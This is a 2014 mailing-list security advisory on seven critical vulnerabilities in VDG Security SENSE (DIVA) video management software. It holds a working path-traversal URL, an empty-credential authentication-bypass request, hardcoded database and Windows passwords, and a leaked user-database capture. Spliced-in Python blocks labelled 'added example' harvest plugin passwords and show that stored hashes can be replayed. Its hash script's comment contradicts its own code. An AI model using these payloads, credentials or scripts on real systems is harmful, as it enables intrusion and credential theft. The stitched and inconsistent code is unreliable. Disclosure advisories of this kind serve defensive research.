Message-ID: <5492D78E.9070000@sec-consult.com>
Date: Thu, 18 Dec 2014 14:33:02 +0100
From: SEC Consult Vulnerability Lab <research@...-consult.com>
To: <fulldisclosure@...lists.org>, <bugtraq@...urityfocus.com>
Subject: [FD] SEC Consult SA-20141218-0 :: Multiple critical vulnerabilities
 in VDG Security SENSE (formerly DIVA)

SEC Consult Vulnerability Lab Security Advisory < 20141218-0 >
=======================================================================
              title: Multiple critical vulnerabilities
            product: VDG Security SENSE (formerly DIVA)
 vulnerable version: 2.3.13
      fixed version: unknown - no vendor confirmation
             impact: critical
           homepage: https://vdgsecurity.com/
              found: 2014-10-01
                 by: Stefan Viehböck
                     SEC Consult Vulnerability Lab
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"VDG Sense is our video management system (VMS). VDG Sense gives you control
of all live images and stored video data, in a user-friendly interface. Our
solution is based on an open platform, tailored to your specific needs and
requirements and ready to be integrated in any security solution."
Source: https://vdgsecurity.com/sense/

"DIVA is our former trademark, which we used to brand our video management
software and other VDG products. With the launch of our new trademark, VDG
Sense, we have rebranded the software to VDG Sense and promote it as such
from September 15, 2014. Other products, such as our servers, are available
under the label VDG."
Source: https://vdgsecurity.com/diva/


Business recommendation:
------------------------
Attackers are able to completely compromise the VDG SENSE server, as they can
gain access at the system level. The SENSE server can then be used as an entry
point into the target infrastructure (lateral movement, privilege escalation).

It is highly recommended by SEC Consult not to use this software until a
thorough security review has been performed by security professionals and all
identified issues have been resolved.

Although the vendor does not respond to our mails any more, some
vulnerabilities seem to be fixed in the most recent version of SENSE (2.3.15).
It is assumed that further critical vulnerabilities exist.


Vulnerability overview/description:
-----------------------------------
1) Unauthenticated local file disclosure
Unauthenticated users can read arbitrary files from the filesystem with the
privileges of the "SYSTEM" operating system user. These files include
configuration files containing sensitive information such as clear text
passwords/password hashes which can be used in further attacks.


2) Authentication bypass / Clear text password disclosure
Some parts of the DIVA application are vulnerable to authentication bypass. This
allows attackers to update the DIVA plugin configuration. Furthermore, DIVA plugin
configurations can be read. This configuration includes clear text DIVA
administrator credentials, as DIVA plugins require access to such an account
for operation.


3) Insecure service configuration / Hardcoded default credentials - Postgres
The PostgreSQL database is offered via the network (TCP port 5432) and can be
accessed remotely using hardcoded credentials which can't be changed.


4) Hardcoded default credentials - Windows Users
Several local Windows users are created in the course of the DIVA setup. These
are used to run some of the DIVA services. These users can be used to log on to the
server running DIVA.


5) Critical information disclosure / User database leakage
After authentication with the DIVA (fat) client via the proprietary protocol
(TCP port 51410) the server returns the contents of the user database
to the client. This works regardless of whether the user has administrator
rights or not.
The user database (users.ini) contains all users and their password hashes.
This information is sufficient to log in as another user. An attacker does not
require knowledge about plain text passwords.


6) Use of plain text protocols
All DIVA communication transport channels (e.g. via TCP ports 80 and 51410) lack
encryption.


7) Buffer overflow vulnerabilities
The DIVA web service API (/webservice) is vulnerable to a stack based buffer
overflow when processing "AuthenticateUser" requests. Both the "user" and the
"password" parameter are vulnerable.
None of the DIVA modules are ASLR-enabled. An exploit that uses ROP to bypass
DEP has been implemented.


Proof of concept:
-----------------
1) Unauthenticated local file disclosure
Arbitrary files can be downloaded because of path traversal vulnerabilities in
the proprietary web server implementation. An example for x64 hosts:
http://<host>/images/../../../../Windows/SysWOW64/config/systemprofile/AppData/Roaming/Diva/Settings/users.ini

Interesting DIVA-specific files:
config/systemprofile/AppData/Roaming/Diva/Settings/users.ini (DIVA user database)
config/systemprofile/AppData/Roaming/Diva/DivaManager/DivaManager.ini (contains DIVA
"master user")
config/systemprofile/AppData/Roaming/Diva/DivaManager/Plugins/ (DIVA plugin
configurations)
[...]
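As an added example (not VDG's code; the proprietary web server's source is not
public), the document-root check that would have refused the request above.
DOCROOT is an assumed install location used only for illustration; the request
targets exercised are the advisory's URL and a few encoded variants of it.

```python
#!/usr/bin/env python3
"""Added example, not VDG's code: the document-root check a web server must
apply before opening a requested file. The server runs on Windows, so paths
are normalised with ntpath; DOCROOT is an assumed location for illustration."""
import ntpath
from urllib.parse import unquote

DOCROOT = r"C:\Program Files\Diva\htdocs"   # assumption, not the real install path


def resolve_under_docroot(request_target, docroot=DOCROOT):
    """Map the request-line target to a file under docroot, or return None.

    Order matters: percent-decode first (so %2e%2e and %5c cannot slip past a
    textual '..' check), treat '/' and '\\' alike because Windows does, apply
    the target OS's normalisation rules, and then compare canonical prefixes
    instead of searching the raw string for '..'."""
    path = unquote(request_target.split("?", 1)[0])
    if "\x00" in path:
        return None                                   # NUL would truncate the name in C
    rel = path.replace("/", "\\").lstrip("\\")
    root = ntpath.normpath(docroot)
    # A drive-absolute rel ("C:\Windows\...") replaces root in join(); the
    # prefix comparison below catches that case as well.
    full = ntpath.normpath(ntpath.join(root, rel))
    try:
        inside = ntpath.commonpath([root, full]) == root   # case-insensitive, per component
    except ValueError:                                     # different drive
        inside = False
    return full if inside else None


# The advisory's request, as seen on the wire (constructed from the URL above).
TRAVERSAL = ("/images/../../../../Windows/SysWOW64/config/systemprofile/"
             "AppData/Roaming/Diva/Settings/users.ini")

if __name__ == "__main__":
    for target in (TRAVERSAL, "/images/%2e%2e/%2e%2e/Windows/win.ini",
                   "/images/..%5c..%5cWindows/win.ini", "/C:/Windows/win.ini",
                   "/images/logo.png"):
        print(f"{target!r:70} -> {resolve_under_docroot(target)}")
```

Run stand-alone it prints None for every traversal variant and the mapped file
path for the legitimate request; the decode-then-normalise-then-compare order
is the part that matters, a substring check for ".." would miss the %5c form.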


2) Authentication bypass / Clear text password disclosure
Authentication for parts of the application can be bypassed by sending an HTTP
Basic Authorization header whose credential decodes to a lone colon ":" (empty
username and empty password):

GET /plugins/divacal/getsettings?sessionkey= HTTP/1.1
Host: <host>
Authorization: Basic Og==

The response contains the plugin configuration for "divacal":

HTTP/1.1 200 OK
Date: Thu, 23 Okt 2014 10:46:28 GMT
Server: Diva HTTP Plugin 2.0
Accept-Ranges: bytes
Connection: Keep-Alive
Content-Type: application/xml; charset=UTF-8
Content-Length: 1179

<?xml version="1.0" ?>
<?xml-stylesheet type="text/xsl" href="../../xml/settings.xsl" ?>
<settings>
  <name>DivaCal settings</name>
  <group>
    <id>0</id>
    <name>DIVA Connection</name>
    <singleinstance>yes</singleinstance>
    <showbuttons>yes</showbuttons>
    <subgroup>
[...]
      <setting>
        <id>1</id>
        <name>DIVAUsername</name>
        <type>string</type>
        <value>Administrator</value>
        <default>Administrator</default>
        <help>The username used to login to to the DIVA management server.</help>
      </setting>
      <setting>
        <id>2</id>
        <name>DIVAPassword</name>
        <type>password</type>
        <value>!DVadmin</value>
        <default>!DVadmin</default>
        <help>The password required to login to the DIVA management server.</help>
      </setting>
    </subgroup>
  </group>
</settings>

Other activated plugins can be queried via the following request:
GET /plugins/?sessionkey= HTTP/1.1
Host: <host>
Authorization: Basic Og==


Plugin settings can be updated as follows:
POST /plugins/http/updatesettings?sessionkey= HTTP/1.1
Host: <host>
Authorization: Basic Og==
Content-Length: 29

groupid=0&DocumentRoot=htdocs
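An added example (not from the advisory or the vendor) that builds the probe
request shown above and pulls the password-typed settings out of a getsettings
response. SAMPLE_XML is the divacal response quoted above, trimmed to the
relevant elements; host and plugin names are parameters.

```python
#!/usr/bin/env python3
"""Added example, not from the advisory or the vendor: build the bypass probe
and harvest credentials from a /plugins/<name>/getsettings response."""
import base64
import xml.etree.ElementTree as ET

# The divacal response quoted in the advisory, trimmed (constructed input).
SAMPLE_XML = """<?xml version="1.0" ?>
<settings>
  <name>DivaCal settings</name>
  <group>
    <id>0</id>
    <name>DIVA Connection</name>
    <subgroup>
      <setting><id>1</id><name>DIVAUsername</name><type>string</type>
        <value>Administrator</value></setting>
      <setting><id>2</id><name>DIVAPassword</name><type>password</type>
        <value>!DVadmin</value></setting>
    </subgroup>
  </group>
</settings>
"""


def basic_auth_header(user="", password=""):
    """Authorization header value. With both fields empty the credential is
    just ':' and base64-encodes to 'Og==', the token used in the PoC."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Basic {token}"


def getsettings_request(host, plugin):
    """Raw HTTP/1.1 request for one plugin's settings, as in the PoC above."""
    return (
        f"GET /plugins/{plugin}/getsettings?sessionkey= HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Authorization: {basic_auth_header()}\r\n"
        "\r\n"
    )


def extract_settings(xml_text):
    """name -> (type, value) for every <setting> element in the response."""
    root = ET.fromstring(xml_text)
    out = {}
    for s in root.iter("setting"):
        name, typ, value = (s.findtext(tag, default="") for tag in ("name", "type", "value"))
        out[name] = (typ, value)
    return out


def password_settings(xml_text):
    """Only the settings the UI would mask: these hold DIVA account passwords."""
    return {n: v for n, (t, v) in extract_settings(xml_text).items() if t == "password"}


if __name__ == "__main__":
    print(getsettings_request("<host>", "divacal"))
    print(extract_settings(SAMPLE_XML))
    print(password_settings(SAMPLE_XML))
```

The same extract_settings() applies to any plugin listed by the
/plugins/?sessionkey= request, since all of them return the same settings.xsl
document shape.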


3) Insecure service configuration / Hardcoded default credentials - Postgres
The hardcoded PostgreSQL "root" user credentials are as follows:

Username: root
Password: ArpaRomaWi


4) Hardcoded default credentials - Windows Users
The created Windows users are as follows:

Username: postgres
Password: !DVService

Username: NTP
Password: !DVService


5) Critical information disclosure / User database leakage
Below is an excerpt from the DIVA protocol communication (TCP port 51410):
    00000000  48 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 H....... ........ <- SERVER
    00000010  00 00 00 00 0d 00 00 20  01 00 02 20 03 00 00 20 .......  ... ...
    00000020  06 00 11 00 32 2e 33 2e  31 33 00 00 02 00 00 20 ....2.3. 13.....
    00000030  01 00 02 40 04 00 00 00  04 00 00 20 06 00 11 00 ...@.... ... ....
    00000040  44 69 76 61 20 73 65 72  76 65 72 00             Diva ser ver.
00000000  b8 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........     <- CLIENT
00000010  00 00 00 00 29 00 00 20  c9 00 02 40 05 00 00 20 ....)..  ...@...
Note: client sends passwordHash and digestHash
00000020  f6 01 01 40 61 64 6d 69  6e 69 73 74 72 61 74 6f ...@...i nistrato
00000030  72 00 00 00 09 00 00 20  f7 01 01 40 49 41 68 6b r......  ...@...k
00000040  43 72 33 61 68 7a 59 39  67 53 57 73 56 37 33 6b Cr3ahzY9 gSWsV73k
00000050  41 42 32 64 51 79 38 3d  00 00 00 00 0a 00 00 20 AB2dQy8= .......
00000060  fa 01 01 40 35 34 38 31  35 36 32 31 38 64 33 65 ...@...1 56218d3e
00000070  31 63 35 35 66 63 30 30  35 65 38 32 61 32 32 30 1c55fc00 5e82a220
00000080  61 34 63 30 00 00 00 00  02 00 00 20 05 00 11 40 a4c0.... ... ...@
00000090  02 00 00 00 03 00 00 20  0b 00 11 40 00 00 00 00 .......  ...@....
000000A0  00 00 00 00 02 00 00 20  0f 00 11 40 00 00 00 00 .......  ...@....
000000B0  02 00 00 20 02 00 11 40  00 00 00 00             ... ...@ ....
    0000004C  30 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 0....... ........ <- SERVER
    0000005C  00 00 00 00 07 00 00 20  ca 00 02 40 02 00 00 20 .......  ...@...
    0000006C  f5 01 01 40 01 00 00 00  02 00 00 20 02 00 11 40 ...@.... ... ...@
    0000007C  01 00 00 00                                      ....
000000BC  50 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 P....... ........     <- CLIENT
000000CC  00 00 00 00 0f 00 00 20  01 00 1c 40 0b 00 00 20 .......  ...@...
000000DC  02 00 1c 40 47 45 54 20  2f 75 73 65 72 6d 61 6e ...@GET  /userman
000000EC  61 67 65 6d 65 6e 74 2f  6f 73 64 73 74 79 6c 65 agement/ osdstyle
000000FC  73 20 44 49 56 41 2f 31  2e 30 00 00 01 00 00 20 s DIVA/1 .0.....
0000010C  03 00 1c 40                                      ...@
    00000080  24 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 $....... ........ <- SERVER
    00000090  00 00 00 00 04 00 00 20  07 01 11 40 02 00 00 20 .......  ...@...
    000000A0  06 00 11 00 00 00 00 00  24 00 00 00 00 00 00 00 ........ $.......
[...]
    00000200  9c 02 01 40 02 00 00 20  06 00 11 00 0d 0a 00 00 ...@...  ........
    00000210  bc 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
    00000220  00 00 00 00 2a 00 00 20  f4 01 01 40 28 00 00 20 ....*..  ...@(..
    00000230  06 00 11 00 5b 61 64 6d  69 6e 69 73 74 72 61 74 ....[adm inistrat -----
    00000240  6f 72 5d 0d 0a 61 64 6d  69 6e 72 69 67 68 74 73 or]..adm inrights |
    00000250  3d 31 0d 0a 61 6e 64 72  6f 69 64 3d 0d 0a 64 69 =1..andr oid=..di |
    00000260  67 65 73 74 48 61 73 68  3d 35 34 38 31 35 36 32 gestHash =5481562 |
    00000270  31 38 64 33 65 31 63 35  35 66 63 30 30 35 65 38 18d3e1c5 5fc005e8 |
    00000280  32 61 32 32 30 61 34 63  30 0d 0a 65 6d 61 69 6c 2a220a4c 0..email | <- DIVA user database
    00000290  3d 0d 0a 66 75 6c 6c 6e  61 6d 65 3d 0d 0a 69 6f =..fulln ame=..io |
    000002A0  73 3d 0d 0a 70 61 73 73  77 6f 72 64 3d 49 41 68 s=..pass word=IAh |
    000002B0  6b 43 72 33 61 68 7a 59  39 67 53 57 73 56 37 33 kCr3ahzY 9gSWsV73 |
    000002C0  6b 41 42 32 64 51 79 38  3d 0d 0a 0d 0a 00 00 00 kAB2dQy8 =....... -----
    000002D0  24 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 $....... ........

For the sake of completeness the password hashing scheme has been reverse
engineered. As both hashes can be used for authentication directly, brute
force attacks against password hashes are not required.

#!/usr/bin/env python3
import hashlib
from base64 import b64encode

user = 'administrator'
password = '!DVadmin'

# digestHash: MD5 over "user:DIVA:password" as hex. The capture above shows
# both the client and users.ini using lowercase hex for this value.
digestHash = hashlib.md5((user + ":DIVA:" + password).encode()).hexdigest().upper()
# passwordHash: base64 of SHA-1 applied twice to the password, no salt
passwordHash = b64encode(hashlib.sha1(hashlib.sha1(password.encode()).digest()).digest()).decode()

print('digestHash', digestHash)
print('passwordHash', passwordHash)
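The exchange above, decoded, as an added example that is not part of the
advisory or of VDG's software. It splits the captured stream on the 4-byte
length prefix, walks the tag/value elements of the client's login frame and
checks the two hash strings against the users.ini entry the server returned.
The frame layout and the field numbers (0x1f6, 0x1f7, 0x1fa) are inferred from
the bytes in the dump, not taken from vendor documentation; LOGIN_FRAME and
USERS_INI are transcribed from the capture above. The final check is the
practical consequence of this issue: the login fields are the stored values
themselves, so any user's entry can be replayed without cracking anything.

```python
#!/usr/bin/env python3
"""Added example, not from the advisory or VDG: decode the captured DIVA
(TCP 51410) login frame and compare it with the leaked users.ini entry.
Layout inferred from the dump: u32 little-endian payload length, 16 zero
bytes, then 4-byte-aligned tag/value elements."""
import configparser
import struct

# Client login frame, transcribed from the capture above (constructed input).
LOGIN_FRAME = bytes.fromhex(
    "b8000000 00000000 00000000 00000000"
    "00000000 29000020 c9000240 05000020"
    "f6010140 61646d69 6e697374 7261746f"
    "72000000 09000020 f7010140 4941686b"
    "43723361 687a5939 67535773 5637336b"
    "41423264 5179383d 00000000 0a000020"
    "fa010140 35343831 35363231 38643365"
    "31633535 66633030 35653832 61323230"
    "61346330 00000000 02000020 05001140"
    "02000000 03000020 0b001140 00000000"
    "00000000 02000020 0f001140 00000000"
    "02000020 02001140 00000000"
)

# users.ini as returned by the server in the dump above (constructed input).
USERS_INI = (
    "[administrator]\r\nadminrights=1\r\nandroid=\r\n"
    "digestHash=548156218d3e1c55fc005e82a220a4c0\r\n"
    "email=\r\nfullname=\r\nios=\r\n"
    "password=IAhkCr3ahzY9gSWsV73kAB2dQy8=\r\n\r\n"
)

FIELD_USER, FIELD_PWHASH, FIELD_DIGEST = 0x1F6, 0x1F7, 0x1FA   # ids seen in the capture


def split_frames(stream):
    """Cut a byte stream into frame payloads: <u32 LE length><payload>."""
    frames, off = [], 0
    while off + 4 <= len(stream):
        (n,) = struct.unpack_from("<I", stream, off)
        payload = stream[off + 4:off + 4 + n]
        if len(payload) != n:
            raise ValueError("truncated frame at offset %d" % off)
        frames.append(payload)
        off += 4 + n
    return frames


def parse_container(buf, fields):
    """Walk one container. Each element starts with a 4-byte tag
    (u16 id-or-count, u8 type, u8 flags). flags 0x20: nested container of
    `count` dwords. type 0x02: message id with no payload. Any other leaf
    owns the rest of its container: type 0x01 is a NUL-terminated, 4-byte
    padded string, everything else a little-endian integer."""
    pos = 0
    while pos + 4 <= len(buf):
        ident, typ, flags = struct.unpack_from("<HBB", buf, pos)
        pos += 4
        if flags == 0x20:
            parse_container(buf[pos:pos + 4 * ident], fields)
            pos += 4 * ident
        elif typ == 0x02:
            fields["msg"] = ident
        else:
            raw, pos = buf[pos:], len(buf)
            if typ == 0x01:
                fields[ident] = raw.split(b"\x00", 1)[0].decode("ascii")
            else:
                fields[ident] = int.from_bytes(raw, "little")
    return fields


def parse_login_frame(payload):
    """Skip the 16 zero bytes after the length and decode the element tree."""
    return parse_container(payload[16:], {})


def load_users_ini(text):
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str            # keep 'digestHash' as written
    cp.read_string(text)
    return {name: dict(cp[name]) for name in cp.sections()}


def replay_credentials(users, name):
    """What a client must send to log in as `name`: the stored values as-is."""
    u = users[name]
    return {FIELD_USER: name, FIELD_PWHASH: u["password"], FIELD_DIGEST: u["digestHash"]}


def login_matches_database(frame, users):
    """True when the captured login fields equal the users.ini entry."""
    f = parse_login_frame(frame)
    sent = {k: f[k] for k in (FIELD_USER, FIELD_PWHASH, FIELD_DIGEST)}
    return sent == replay_credentials(users, f[FIELD_USER])


if __name__ == "__main__":
    (frame,) = split_frames(LOGIN_FRAME)
    print(parse_login_frame(frame))
    print("replayable:", login_matches_database(frame, load_users_ini(USERS_INI)))
```

Run stand-alone it prints the decoded fields (message id 0xc9, the three
strings and four integer fields) and "replayable: True". The same splitter
works on a longer capture, since every frame in the dump carries its payload
length in the first four bytes.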


6) Use of plain text protocols
No proof of concept necessary.


7) Buffer overflow vulnerabilities
Detailed proof of concept exploits have been removed for this vulnerability.



Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in 2.3.13, which was the most
recent version at the time of discovery.



Vendor contact timeline:
------------------------
2014-10-24: Sending responsible disclosure policy and requesting encryption
            keys.
2014-10-28: Vendor responds, provides encryption keys.
2014-10-29: Sending advisory and proof of concept exploit via encrypted
            channel.
2014-10-29: Vendor confirms receipt of advisory.
2014-11-10: Requesting status update.
2014-11-17: Vendor states that team is "very well on track to solve the
            issues".
2014-11-18: Clarifying criticality of vulnerabilities and viability of attack,
            even in closed networks; referring to Shodan search results.
2014-12-10: Requesting status update. No reply.
2014-12-18: SEC Consult releases security advisory.


Solution:
---------
It seems some of the vulnerabilities are fixed in the most recent version of
SENSE (2.3.15). The vendor stopped responding to our emails so we don't know
what vulnerabilities were actually fixed.


Workaround:
-----------
No workaround available.


Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab

SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich

Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone:   +43 1 8903043 0
Fax:     +43 1 8903043 15

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

Interested in working with the experts of SEC Consult?
Write to career@...-consult.com

EOF Stefan Viehböck / @2014


Download attachment "signature.asc" of type "application/pgp-signature" (820 bytes)


_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
